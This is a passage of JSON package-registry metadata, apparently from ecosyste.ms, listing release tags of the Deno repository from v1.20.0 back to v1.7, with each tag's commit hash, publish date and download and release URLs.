commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7